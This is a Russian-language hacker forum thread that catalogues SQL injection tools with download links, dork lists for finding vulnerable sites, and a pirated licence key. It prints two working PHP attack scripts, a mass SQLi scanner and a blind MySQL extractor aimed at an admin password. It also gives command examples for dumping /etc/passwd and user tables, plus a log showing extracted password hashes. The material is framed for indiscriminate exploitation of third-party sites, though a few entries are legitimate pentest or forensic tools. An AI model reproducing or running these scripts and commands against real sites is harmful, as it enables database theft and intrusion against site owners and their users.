Софт для работы с SQL Injection

ExploitMyUnion

​

Написанная на Python (+PyQt) тулза для автоматизации эксплуатирования SQL Injection.

Скачать:
http://www.sendspace.com/file/gbxaa1
----------------------------------------------------------------------------------------------------------------------------------

BSQL Hacker

​

Новое мощное средство для проведения инъекций в самые разнообразные виды баз, причём даже не разных веток, а семейств. В первую очередь предназначено для людей, не сильно опытных. Поддерживаются 4 вида SQL-инъекций: Blind SQL Injection, Time Based Blind SQL Injection, Deep Blind (based on advanced time delays) SQL Injection и распознавание уязвимости по выводу соответствующей ошибки базы на WEB-ресурсе. BSQL способен производить попытки инъекции, используя куки, POST-запросы, модифицированные HTTP-заголовки.

Скачать:
http://www.sendspace.com/file/624jhg
----------------------------------------------------------------------------------------------------------------------------------

SQL/XSS/LFI/RFI Scanner​

Ищет уязвимости SQL, XSS, LFI, RFI

В поле Dork вставляем запрос типа

Code:

index.php?id= 
trainers.php?id= 
buy.php?category= 
article.php?ID= 
play_old.php?id=

В архиве есть список

Если поставить галочку на Get From All Domians значти что искать будем скули с любыми доменами



Хоп! и короче видим рабочие скули



Если вставить в поле .com, то все домены будут соm кагбэ



Скачать:
http://narod.ru/disk/26438803000/ExploitScanner.rar.html

(c) описание by Dr..VATSON​

----------------------------------------------------------------------------------------------------------------------------------

Netsparker Community Edition​

​

Одна из ведущих коммерческих разработок для поиска и эксплуатирования уязвимостей в веб-приложениях. Представлена бесплатная версия для Community.

Скачать:
http://www.sendspace.com/file/gswl2u

P.S. данная тема создана для каталогизации всего софта предназначенного, для работы с SQL Injection. А так же чтобы все разрозненные темы подобного содержания, находились в одном месте.
P.P.S. убедительная просьба весь софт заливать исключительно на [sendspace.com]. Это наиболее удобный во всех отношениях ФО.

 

InjectoR

Программа для кодирования исходного текста в ASCII коды
пригодится когда magic_gpc_quotes=On



Кодер: SMERSH

Скачать: http://www.sendspace.com/file/zea3i2

тулзу юзаю примерно 2 года )

 

Havij 1.13



Особенности:
Поддерживаемые базы данных с инъекционными методами:
MsSQL 2000/2005 с ошибкой
MsSQL 2000/2005 никакой ошибки (union based)
MySQL (union based)
MySQL слепая
MySQL ошибка основана
Oracle (union based)
MSAccess (union based)
Автоматическое обнаружение базы данных
Автоматическое определение типа (строка или целое число)
Автоматическое обнаружение ключевых слов (поиск разница между положительным и отрицательным ответом)
Попытки различных синтаксисов инъекций
Поддержка прокси
Реальный результат времени
Функции для замены пространства /**/,+,... от IDS и фильтры
Старайтесь не использовать строки (magic_quotes аналогичные обойти фильтры)
Обход незаконного союза
Полный настраиваемые заголовки HTTP (например, ссылка и User Agent)
Нагрузка куки с сайта для проверки подлинности
Догадываясь, таблиц и столбцов в базе <5 (а также в слепых) и MSAccess
Быстрое получение таблиц и столбцов для MySQL
Multi нить Администратор страницы поиска
Multi поток Интернет MD5 взломщика
Начало Информация СУБД
Как таблиц, столбцов и данных
Командная executation (MSSQL только)
Чтение системных файлов (MySQL только)
вставки / обновления / удаления данных

Скачать

 

Crypto SQL (Автор CodeSender https://forum.antichat.ru/member.php?u=133052)



- Генерирует указанное число полей для UNION запроса
- Кодирует заданную строку в Hex, Char, Aes


Скачать


rsaUnDumper[sql] – универсальный дампер SQL INJECTION



Описание:
• многопоточность (от 1 до 100 потоков);
• поддержка http прокси;
• система передышек (для предотвращения ддоса);
• возможность дампа практически любых данных (от версии MySQL, до выборочных ячеек БД);
• возможность указать свой UserAgent, Referer;
• реализована система «Пауза \ Продолжить dump» (вы можете приостановить процесс, усыпить комп на ночь, а утром продолжить как ни в чем не бывало );
• реализована система повторной проверки тех запросов к серверу, при выполнении которых произошла ошибка;
• отображение кол-ва потоков, работающих в данный момент;
• отображение общего числа limit-ов;
• отображение последнего limit-а, которому был послан запрос;
• отображение кол-ва ответов, которые были записаны в файл;
• автоматическая система проверки новых версий программы, теперь вы всегда будете в курсе последних обновлений;
• сворачивание программы в трей (если дамп предвидится большой – незачем мозолить глаза лишними вкладками);
• сохранение настроек в конфиг файл при закрытии программы и автозагрузка их при запуске;
• информативные всплывающие подсказки при наведении на элементы интерфейса;

Требования: установленный .Net Framework 2.0+

Mini FAQ:

- запрос должен начинаться на http:// и заканчиваться конструкцией limit (подробнее во всплывающей подсказке), активное поле вывода в запросе замените на <{param}>, после чего в поле «Данные для дампа…» перечислите имена того, что нужно сдампить (например версия MySQL, пользователь MySQL, имена колонок…).

Скачать


[Perl] SQLinjector V2.0 by AlpHaNiX

Описание:


- Evasion choise
- Proxy support
- URL Extractor + Vuln Scanner & Checker

Avaible Options :

– MySQL

MySQL column length calculator MySQL v4/5
MySQL target website db global infos MySQL v4/5
MySQL Full Schema Extractor MySQL v5
MySQL Data Dump MySQL v4/5
MySQL load_file fuzzer MySQL v4/5
MySQL Table_name Fuzzer MySQL v4
MySQL Column_name Fuzzer MySQL v4

– MsSQL

MsSQL DB global info
MsSQL Tables Extractor
MsSQL Columns Extractor
MsSQL Data Dumper

– Vulunerability Scanner

URL Extractor , SQL Vulnerability’s Scanner & Checker


Скачать


[Perl] Sqli scanner script by int3

Описание:

- Многопоточный сканнер на наличие SQL Инъекций
- Поддержка прокси
- Сканирует по списку URL из файла

Скачать



Sql injection scanner by Pr0xY (Sh3ll.Team)

PHP:

<?php
 
 #Sh3ll.Team 2008-08-28
 #Sql injection scanner by Pr0xY
 
 $http  = '';
 
 if($http == '')
    die("Http is empty!\n\n<b>Powered by Pr0xY</b>\n# Sh3ll.Team [2008-09-02]");
 
 echo "Scan for : <b>$http</b> \n\n";
 
 $http  = (substr($http, -1) != '/') ? $http.'/' : $http;
 $found = getGet();
 
 function getGet()
 {
    global $http;
     
    $getN = array();
    $fenN = array();
                 
    $htm = @file_get_contents($http);
          @preg_match_all('/((\/[a-zA-Z0-9]+\/)|)([a-zA-Z0-9]+\.[a-zA-Z0-9]+\?)([a-zA-Z0-9]+)(\s*\=)([a-zA-Z0-9]+)/im', $htm, $gets);
 
    foreach($gets[0] as $get)
    {
       $get = str_replace($http, '', $get);
   
       if(!in_array($get, $getN))
       {
          @preg_match_all('/(.*)(\?)/', $get, $gn);
           $name = str_replace('?', '', $gn[1][0]);
 
           if(!@in_array($name, $fenN) && @in_array(substr(strrchr($name, "."), 1), array('php', 'asp', 'aspx'))){
              $getN[] = $get;
               $fenN[] = $name;
           }   
       }   
    }
    return $getN;
 }
 
 foreach($found as $get)
 { 
    $address = $http.$get;
    
    $htm1 = @file_get_contents($address);
    $htm2 = @file_get_contents($address.'%20and%20\'a\'%20=%20\'a\'');
     
    if($htm1 == $htm2)
       echo $get." <b><font color=\"#1B9B1B\">SQL injection!</font></b> \n";
    else
       echo $get." <b><font color=\"#D80404\">Failed!</font></b> \n";
     
 }
 
 echo "\n\n<b>Powered by Pr0xY</b>\n";
 
?>


Absinthe 1.4.1 (Windows, Linux)



Описание:


- Автоматизированная утилита для проведения атак класса SQL-injection.
- Поддержка MS SQL Server, MSDE, Oracle, Postgres.
- Эксплуатация инъекций различными способами (GET,POST,COOKIE).
- Возможность использования SSL.
- Прокси.
- Поддержка Blind, Error Based.
- Вывод лога работы в файл.


Скачать (Версия для Windows)

Скачать (Версия для Linux)



MySQL Dump v 1.0 (Coded By Flash http://h4cky0u.org)



Описание:

- Дамп базы через MySQL инъекцию.
- Парсер уязвимых дорков.
- Сканнер спарсенных URL на наличие SQL инъекций
- Опциональный выбор поисковика, через который будут парситься дорки (Google, Yahoo, Live Search, Altravista, Terravista).
- Выставление задержек.
- Поддержка GET,POST.
- Конвертер Hex, Char.
- Поиск MD5 хэша по онлайн базам.

Скачать


SQL checker by Acid Version 1.4 (http://forum.xaknet.ru/member.php?u=41587)




Описание:

- Парсит поисковики, находит ссылки и сохраняет их в файл, затем проверяет этот файл на наличие SQL инъекций, и если таковые обнаружены, то раскручивает скулю до вида:
"http://site.com/cart.php?id=23-1999+union+select+1,2,3,4,5,6,7,8--".
- Парсит по заданному списку дорков или рандомно
- Встроенный парсер bing.com
- Многопоточный
- Прогресс бар


Скачать


Скрипт для раскрутки MySQL Blind Инъекций без пробелов и запятых
(Автор v1d0q https://rdot.org/forum/member.php?u=322)

PHP:

<?php
function send_xpl($url, $xpl){ 
    $u=parse_url($url); 
    $req ="GET ".$u['path']."/".$xpl." HTTP/1.1\r\n"; 
    $req.="Host: ".$u['host']."\r\n"; 
    $req.="Connection: Close\r\n\r\n"; 
    $fs=fsockopen($u['host'], 80, $errno, $errstr, 30) or die("error: $errno - $errstr<br>\n"); 
    fwrite($fs, $req); 
    while (!feof($fs)) { 
          $res .= fread($fs, 8192); 
    } 
    fclose($fs); 
    return $res; 
} 
function xpl($field, $condition, $pos){ 
    global $from; 
    $xpl="?id=(155)and(lower(ascii(substring((select($field)$from)from($pos)for(1)))))$condition/*"; 
    return $xpl; 
} 
function cond($url, $field, $cond, $pos, $ch) { 
    global $tfind; 
    if(preg_match('/'.$tfind.'/', send_xpl($url, xpl($field,$cond.$ch,$pos)))) 
        return 1; 
    else 
        return 0; 
} 
function getChar($url, $field, $pos, $lb=0, $ub=255) { 
    while(true) { 
        $M = floor($lb + ($ub-$lb)/2); 
        if(cond($url, $field, '<', $pos, $M)==1) { 
            $ub = $M - 1;  
        } 
        else if(cond($url, $field, '>', $pos, $M)==1) { 
            $lb = $M + 1; 
        } 
        else 
            return chr($M); 
        if($lb > $ub) 
            return -1; 
    } 
} 
$tfind="textfromtruequery";  
$url="http://site.ru"; 
$field="pwd"; //всегда должно быть тру. 
$from="from(db.table)where(login=0x61646d696e)"; 
if(preg_match('/'.$tfind.'/', send_xpl($url, xpl("version()",">1",1,$from)))) 
{ 
    echo "works\r\n"; 
} 
else  
    die("check sql query"); 
for($i=1;$i<=100;$i++) 
{ 
$c = getChar($url, $field, $i, 46, 122, $from); 

        if($c==-1) 
        die("\r\nend"); 
    else  
        echo $c; 
} 
?>


[Perl] MySQL injector by Login - Root


Описание:

- Подбор количества столбцов
- Hex значений при magic_quotes - on
- Вывод таблиц, колонок, баз, попытка чтения /etc/passwd/ через load_file() и тд

Вывод работы скрипта:



Скачать


MsSQL Injection Helper v 1.0



Скачать


MsSQL Injection Helper v 1.1




Скачать



SQL Injection Finder



Описание:

- Парсит сайты подверженные SQL инъекциям по указанному дорку

Скачать

 

SQL Injector By Dr.Z3r0 (PHP) (https://rdot.org/forum/member.php?u=21)

Описание:

- Скрипт проверяет переданный ему линк на скуль иньекты (по средствам BENCHMARK).
После того, как скуль иньект обнаружен, скрипт определяет количество полей, выводимое поле, и если версия MySQL5 выводит дамп information_schema.
- Умеет обходить фильтрацию кавычек, пробелов и основных ключевых операторов.

Юзать так: script.php?link=http://test.ru/news.php?id=1

Где http://test.ru/news.php?id=1 - ссылка для проверки на инъект

Скачать


Blind SQL Injector By Lukmus (Ruby)
(https://forum.antichat.ru/member.php?u=104387, http://blog.lukmus.ru)

Описание:

- Многопоточный скрипт для проведения Blind MySQL инъекций
- Подбор символов через их ASCII коды
- Вычисляет паралельно несколько символов, количество которых, равно количеству потоков заданных в конфигурационном файле.


Скачать



Blind SQL Injection Dumper v1.1 By Shadow (Win32 Console)
(https://rdot.org/forum/member.php?u=12)

Описание:

1. Возникает сложность при использовании большой и сложной конструкции запроса, особенно при переборе с использованием LIMIT.
Утилита с ключом -q позволяет автоматизировать этот процесс.
На вход подаете SQL запрос к какой нибудь таблице, прога добавляет условно бесконечный LIMIT на выходе получаете дамп на консоли и в файле.
2. При чтении файла данным способом вывод ограничивается 64 символами.
Утилита с ключом -f позволяет автоматизировать этот процесс и дампить файл блоками по 64 символа.
На вход подаете полный путь до файла который нужно сдампить с целевого хоста, на выходе получаете дамп в файле.

Синтаксис:

BlindSQLiDumper.exe [full path whith vuln param] -[q,f [param]] [file out(default result.txt)]

-q [sql query to unlimit repeat]
-f [full path to filename for download]

Пример для дампа данных:

BlindSQLiDumper.exe test.com /forum/index.php?id=-123' -q "select table_name from information_schema.tables" tables.txt


Пример для дампа файла:

BlindSQLiDumper.exe test.com /forum/index.php?id=-123' -f /etc/passwd passwd

Особенности:

1. Имя хоста без http://
2. SQL запрос обязательно в кавычках.
3. По умолчанию создается файл result.txt в текущей дире.
4. Имя файла без кавычек, т.к. автоматически преобразует в hex эквивалент.
5. Естественно необходим file_priv = Y

Лог работы:

HTML:

========================
Blind SQL Injection Dumper
by [53x]Shadow for Antichat.ru
Based on Qwazar Fast Blind SQL Injection Method
Need MySQL version >= 5.0.* 
 ========================
start...
sql query: select password from users
query result:  358fa3824cfe5ac363f5ec254eafff57  acd455efd4541bf9b2e05f895c957e83
Dump stopped!

Скачать


SQL Scanner By Oxygenique (VB6)

Описание:

- Чекер выдачи поисковиков на SQL инъекции, путем подставления кавычки в целевой запрос.




Скачать

 

WebCruiser - Web Vulnerability Scanner V2.4.2



Описание:
* Crawler(Site Directories And Files);
* Vulnerability Scanner: SQL Injection, Cross Site Scripting, XPath Injection etc.;
* SQL Injection Scanner;
* SQL Injection Tool: GET/Post/Cookie Injection POC(Proof of Concept);
* SQL Injection for SQL Server: PlainText/Union/Blind Injection;
* SQL Injection for MySQL: PlainText/Union/Blind Injection;
* SQL Injection for Oracle: PlainText/Union/Blind/CrossSite Injection;
* SQL Injection for DB2: Union/Blind Injection;
* SQL Injection for Access: Union/Blind Injection;
* Post Data Resend;
* Cross Site Scripting Scanner and POC;
* XPath Injection Scanner and POC;
* Auto Get Cookie From Web Browser For Authentication;
* Report Output.
Скачать
линк

лекарство от жадности:
st0p.org
9EF6-CC8C-F068-B1D6

Standalone NoMore AND 1=1 v04

Описание:
хороший сборник/помошник готовых запросов для пентестинга(не только SQL injection)
Скачать
линк
вторая ссыл http://upwap.ru/1133629
перезалил еше на другой фо дабы некоторые не смогли качать последнюю, но у мну качается

 

Linux tools

Linux tools

Blind SQL Injection Perl Tool​

Blind SQL Injection Perl Tool (bsqlbf) - небольшой скриптик на Perl для извлечения информации из баз данных сайтов, уязвимых к sql-инъекциям.

Скачать:
http://www.sendspace.com/file/kexay0

FG Injector 0.9a​

FG-Injector - открытый фреймворк, призванный помочь в поиске уязвимостей класса sql-injection в веб-приложениях. Включает в себя встроенный прокси для перехвата и модификации HTTP-запросов, а также интерфейс для автоматической эксплуатации уязвимостей.

Скачать:
http://www.sendspace.com/file/y6ugyu

MySqloit 0.2​

MySqloit - утилита для проведения sql-инъекций на LAMP (Linux, Apache, MySQL, PHP) и WAMP (Windows, Apache, MySQL, PHP) платформах. Умеет загружать и выполнять шеллкоды из Metasploit Framework через SQL-Injection уязвимости в MySql.

Скачать:
http://www.sendspace.com/file/6wr6sv

SQID 0.3​

SQLID (SQL Injection digger) - консольная программка для автоматизации поиска и эксплуатации sql-инъекций и других ошибок. Ищет инъекции на веб-страницах, а также тестирует все поля для ввода на наличие возможных уязвимостей к инъекции.

Скачать:
http://www.sendspace.com/file/6951a9

SQL Power Injector 1.2​

SQL Power Injection - инструмент, помогающий пентестеру выполнять SQL команды через уязвимую страницу. Его основное заключается в способности автоматизировать и ускорить "слепые" инъекции за счет распараллеривания на несколько потоков.

Скачать:
http://www.sendspace.com/file/13pbab

Sqlbftools 1.2​

SQLbftools - набор инструментов для извлечения информации из MySQL-базы данных при помощи "слепой" sql-инъекции.

Скачать:
http://www.sendspace.com/file/16crex

SQLBrute​

SQLBrute - инструмент для извлечения данных из БД при помощи "слепых" sql-инъекций. Использует брут по времени ответа сервера и по возвращенной сервером ошибке для Microsoft SQL Server, и брут по ошибке для Oracle. Написан полностью на Python, многопоточен и не требует установки дополнительных библиотек.

Скачать:
http://www.sendspace.com/file/6owsla

SQLIer 0.8.2b​

SQLIer - принимает в качестве входных данных уязвимую к инъекции URL и пытается определить всю необходимую информацию для построения ядовитого запроса к БД. Почти не требует участия пользователя (в случае, если программа не смогла корректно определить имя таблицы/поля, пользователю все же приходится помочь ей). Строит UNION SELECT запросы для извлечения паролей из базы.

Скачать:
http://www.sendspace.com/file/0eq575

Sqlmap 0.8​

Утилита, написанная на языке Python, предназначенная для автоматизации так называемых слепых SQL инъекций. Поддерживает MySQL, PostgreSQL и Microsoft SQL Server.

Скачать:
http://www.sendspace.com/file/qoid5u

SQLNinja 0.2.3​

Sqlninja - маленький инструмент на Perl для эксплуатации уязвимости SQL-injection. Его главная цель состоит в том, чтобы обеспечить удаленный доступ к уязвимому серверу базы данных. В новой версии можно выделить такие изменения, как оптимизацию брутофорс-метода, возможность использования пробела в строках эксплоита и установку исходного значения FQDN, равное 250.

Скачать:
http://www.sendspace.com/file/e0cwks

 

Havij v1.14 Advanced SQL Injection Tool

Havij v1.14 Advanced SQL Injection tool.
​

Новые возможности этой версии:

* Sybase (ASE) базы данных добавил.
* Sybase (ASE) Слепой базы данных добавил.
* Время метода, основанного на MsSQL добавил.
* Время метода, основанного на MySQL добавил.
* Mod_security обойти добавил.
* Пауза добавлена кнопка.
* Обычная проверка подлинности добавил
* Выборочная проверка подлинности добавил.
* Сообщение данных поля добавил
* Ошибки, связанные с символа точки в имени базы данных фиксированной
* Синтаксис более писать, когда определяется пользователем в слепой инъекции фиксированной.
* Обнаружение MSSQL базы данных от ошибок при использовании JDBC драйвера исправлена.
* Тайм-аут ошибка в md5 взломщик фиксированной.
* Значение по умолчанию исправлена ошибка
* Строка кодирования исправлена ошибка в PostgreSQL
* Инъекционных URL переписать страницы добавил.
* Введения в любую часть HTTP-запрос вида печенья, User-Agent, Referer, и т.д. доступны
* Ошибка в поиске строку столбца фиксированной. (Специально для MySQL)
* Поиск столбцов кол в MySQL, когда входное значение не является эффективным добавил.
* Размера окна ошибку в пользовательских точек на дюйм фиксированной.
* Некоторые ошибки в поиске количество строк фиксированной.
* Получение имя базы данных в MSSQL ошибка основана при инъекции типа угадывается целое, но это строка фиксированной.​

ITSecTeam.com​

 

Safe3 SQL Injector

​

Полезный инструмент пентестера, позволяющий реализовывать инъекции в MySQL, Oracle, PostgreSQL, MSSQL, ACESS, DB2, Sybase, Sqlite, с помощью Error/Union/Blind/Force SQL injection техник. При этом тулза может проверить на стойкость WAF (Web Application Firewall) на стороне сервера.

Скачать:
http://www.sendspace.com/file/avza1j

Context App Tool

​

Комплекс для полуавтоматического пентеста, включающий ряд полезных инструментов. Работает в зависимости "от контекста" - отсюда и название. Один из них - модули для обнаружения SQL- и XSS-инъекций, а также фаззинг форм для обнаружения CRSF багов.

Скачать:
http://www.sendspace.com/file/kyc5n3

ESF

​

Инструмент для определения версий Microsoft SQL Server 2000, Microsoft SQL Server 2005 и Microsoft SQL Server 2008. Особенностью программы является не "сырое" отображение версии, а привязка ее к определенному сервис паку и релизу. Таким образом, ESF может подсказать, какие патчи еще не установлены.

Скачать:
http://www.sendspace.com/file/ly8pzt

Grendel-Scan

​

Перед нами кроссплатформенный сканер для поиска уязвимостей в веб-приложениях. Среди задач во время разработчики обозначили: полную кроссплатформенность, GUI для всех ОС, отсутствие зависимостей (кроме Java), обнаружение и использование найденных уязвимостей. В итоге со всеми требованиями у них получилось выпустить довольно универсальный сканер, включающий:

• встроенный прокси для перехвата данных

• фаззер HTTP-запросов, в том числе собранных полностью вручную

• модуль для SQL injection

• CRLF injection

• Cross-site request forgery (CSRF)

• обнаружение скрытых директорий (Directory traversal)

• модуль для выяснения данных о жертве (обработка Robots.txt, ошибок системы и т.д.)

• пентест конфигурации веб-демона (Cross-site tracing, Proxy detection)

В общем-то, это был бы самый обычный сканнер, если бы не реализация некоторых редких видов атак, вроде разновидности XSS – cross-site request forgery.

Скачать:
http://www.sendspace.com/file/joz59q

Hexjector

​

Открытая разработка для автоматизированного поиска ошибок в скриптах, которые могут привести к SQL-инъекциям.

Скачать:
http://www.sendspace.com/file/5h6qiu

 

rsaUnDumper[sql] 2.0– универсальный дампер SQL INJECTION



Описание:


Отличия от версии 1.5:

• Добавлена возможность редактирования заголовков

• Работа через POST

• Поддержка SOCKS4/SOCKS5 прокси



Требования: установленный .Net Framework 2.0+


Скачать

 

sqlinject-finder

​

Этот небольшой скрипт предназначен для поиска SQL-injection по pcap-файлам снифера. Скрипт смотрит в GET- и POST-запросах возможные места для проведения атаки и выводит отчет в понятном виде. Помимо существующей базы проверок достаточно просто добавить и свои правила. Программа очень полезна при расследовании инцидентов, если необходимо определить, как злоумышленник проник в систему, и закрыть уязвимость.

Скачать:
http://www.sendspace.com/file/og8afs

SFX-SQLi

​

Описание техники инъекций (Select For XML SQL injection) и утилита для ее реализации. Техника основана на ошибке в FOR XML, позволяющей конвертировать все содержание таблицы в одну строчку, и позволяет извлечь дамп данных из Microsoft SQL Server 2005/2008.

Скачать:
http://www.sendspace.com/file/hvghaz
http://www.sendspace.com/file/44mn6k [source code]
http://www.sendspace.com/file/dojcle [описание техники]

ProxyStrike

​

Помощник для пентеста приложений, реализованный в виде прокси. На данном этапе развития имеет модули для реализации SQL-Inj и XSS.

Скачать:
http://www.sendspace.com/file/p6afel
www.youtube.com/watch?v=l8kioy4QX7U [video manual]

SecuBat

​

Сканнер безопасности, заточенный для анализа веб-сайтов на наличие Sql-инъекций и XSS.

Скачать:
http://www.sendspace.com/file/alfvwr

WITOOL

​

Тулза для реализации SQL-инжекций в SQL Server и Oracle c GUI-интерфейсом, написанная на .NET (а потому требующая установленный в системе фреймворк).

Скачать:
http://www.sendspace.com/file/c074hh

 

sqlsus

​

Специальная утилита для реализации инъекций в базы данных MySQL. С помощью sqlsus ты намного проще сможешь эксплуатировать найденный баг, получив структуру базы, внедрив SQL-запрос, скачав с сервера нужные файл, закачав бэкдор и т.д., и т.п. Примечательно, что в качестве инструмента для хранения полученных дампов используется база SQLite, что чрезвычайно удобно. Можно, например, сделать копию базы, переместив таблицы или колонки с уязвимого сервера себе в локальную базу на SQLite и полноценно работать с ней. Если ты не можешь обратиться к базе information_schema, или если ее не существует, тулза поможет пробрутфорсить название таблиц и колонок. sqlsus поможет реализовать и blind-инъекции.

Скачать:
http://dl.dropbox.com/u/20490401/sqlsus-0.5rc1.tgz

Paros

​

Этот хитрый прокси-сервер, написанный на JAVA, позволяет тестировать веб-приложения на наличие распространенных ошибок. Порой подмена referer'a обеспечивает прямой доступ к админке, а неправильно составленная кука совершенно непредсказуемо обрабатывается. С помощью Paros ты можешь «на лету» изменять исходящие HTTP/HTTPS запросы, логировать собственный траф, проверять сайты на наличие SQL Injection и XSS уязвимостей с помощью встроенных специальных утилит. Получаем сканнер и MITM proxy в одном лице! Думаю, ты поймешь, что можно творить с помощью Paros.

Скачать:
http://dl.dropbox.com/u/20490401/paros-3.2.13-win.exe

w3af

​

w3af - это фреймврок для поиска и эксплуатации атак на веб-приложения. Что-то вроде Metasploit, но в контексте веб-приложений. w3af состоит из ядра и плагинов, который пишутся на Python'е. Сейчас в проект включены более 130 аддонов, реализующие проверки и эксплуатацию SQL инъекций, xss, локальный и удаленные инклуды и т.д.

Скачать:
http://dl.dropbox.com/u/20490401/w3af-1.0-rc3.exe

 

WebCruiser - Web Vulnerability Scanner

​

Автоматизированный сканнер безопасности веб-проектов. Включает в себя паука (crawler), исследующего структуру каталогов, механизмы для поиска разного типа уязвимостей (SQL Injection, Cross Site Scripting, XPath Injection и т.д.), инъектор данных в GET/Post запросы и кукисы, а также другие места.

Скачать:
http://dl.dropbox.com/u/20490401/WebCruiser.zip

Wfuzz

​

Универсальная программа для пентеста веб-приложений. Включает в себя брутфорсер форм, GET- и POST-запросов, сканнер для поиска инжекций (SQL, XSS, LDAP), универсальный фаззер для использования в веб-среде.

Скачать:
http://dl.dropbox.com/u/20490401/wfuzz-1.4b-win.tar.gz

WebSlayer

​

Основная цель приложения – брутфорс различных мест в веб-приложениях.

Скачать:
http://dl.dropbox.com/u/20490401/WebSlayer-Beta.msi

 

Слепой кот

​

The experimental multithreaded tool (Blind Cat) is running multiple instances of CURL, which send parametrized HTTP requests to the vulnerable web application. Then responses are analyzed and another requests with modified parameters are issued until the correct characters in SQL response are detected.

Скачать:
http://dl.dropbox.com/u/20490401/blind_cat.zip
http://dl.dropbox.com/u/20490401/blind_cat_source.zip [source]
Видео демонстрации возможностей:
http://www.youtube.com/watch?v=Dkp4artwJnE

 

SQLi Checker

SQLi Checker

SQLi Checker – программа для проверки списка URL’ов на наличие уязвимостей типа SQL Injection



​

Функционал:

Многопоточность (программно)
Поддержка HTTP(s) прокси
Поддержка SSL




Пример source:

Code:

  http://site.com/index.php?id=1
    http://site.com/index.php?inc=ololo&id=1
    …

Скачать SQLi Checker

Источник i-pro.name ​

 

Subgraph Vega Vulnerability Scanner

​

Описание: Vega это платформа с открытым исходным кодом для тестирования безопасности веб-приложений. Vega поможет вам найти такие уязвимости как SQL-инъекции, Cross-Site Scripting (XSS), обнаружить раскрытие конфиденциальной информации, а также другие уязвимости. Приложение написано на языке Java, имеет GUI интерфейс и доступно на Linux, OS X и Windows.

Официальный сайт: subgraph.com

 

Парсер дорков Google,Yahoo,Bing

Search Engine Scraper V0.2​

​

+ Работает с прокси
+ Возможность закгрузки кейвородов (дорков) из списка
+ Возможность выбрать домен поисковой системы(RU,DE...)
+ Возможность выбрать язык
+ PR checker
- Подвисает

Источник:bottopia.com
Скачать
VT
http://www.virustotal.com/file-scan/report.html?id=198ca5aa01185322588c0653dfe71ec4ea6b15b057ec21a320e26b1f980f04b1-1323456012

 

NTO SQL Invader

​

Описание (оригинал):
NTO SQL Invader gives the ability to quickly and easily exploit or demonstrate SQL Injection vulnerabilities in Web applications. With a few simple clicks, you will be able to exploit a vulnerability to view the list of records, tables and user accounts of the back-end database.
Easy to use - The tool’s GUI interface enables you to simply paste the injectable request found by a DAST tool or feed a detailed request straignt from an application scan report. You can then control how much information is harvested.
Clearly presents evidence - Unlike tools that provide all data via command line, NTO SQL Invader provides the data in a organized manner that is useful for both executive meetings as well as technical analysis and remediation.
Enables easy transport of logging data - All of the data harvested from NTO SQL Invader can be saved into a CSV file so the reports can be included as penetration evidence as part of a presentation or POC.

В общем еще 1 программа для раскрутки SQL Injection. Может кому будет полезна.

Официальный сайт программы: NTObjectives

Скачать: NTO SQL Invader

 

Vulnerable site finder v1.1

Vulnerable site finder v1.1

Code:

Hey CHF

Here is my latest tool "Exploit Scanner Tool" witch will allow you to search google for links then
scan them links for vulnerabilities.

After a pretty successful release of the beta version of "Vulnerable site finder beta" i made a new version "v1.1"

New features:

- Faster scanning
- Site domains Eg .gov .edu
- Progress bar bug fixed
- Import urls list
- Export links before and after scanning them

Видео по работе



scan :
https://www.virustotal.com/file/b2c171f32e7a50413303f931d415471fbb7e43ad3ebcb5b36647ec46b68b2a15/analysis/1328461692/

download at:
http://gartland1.co.uk/?p=104
http://www.sendspace.com/file/y3zlll
http://upwap.ru/2035282
http://keep2.me/fd34336

 

Vulnerable site finder v1.2 (SQLi Scanner)

Code:

Hey CHF[/CENTER]

[CODE]- Faster scanning
- Site domains Eg .gov .edu
- Progress bar bug fixed
- Import urls list
- Export links before and after scanning them
- Custon error’s
- Custom site’s
- Updater
- No scan limit
- Comes with 10k + dorks 

Code:

VT
https://www.virustotal.com/file/c98a2e90c436f86daf363561751b8cf69536852d5682861bd0b26204ff357d1b/analysis/1328897424/

http://www.mediafire.com/?mzdkw9onbbwu05b​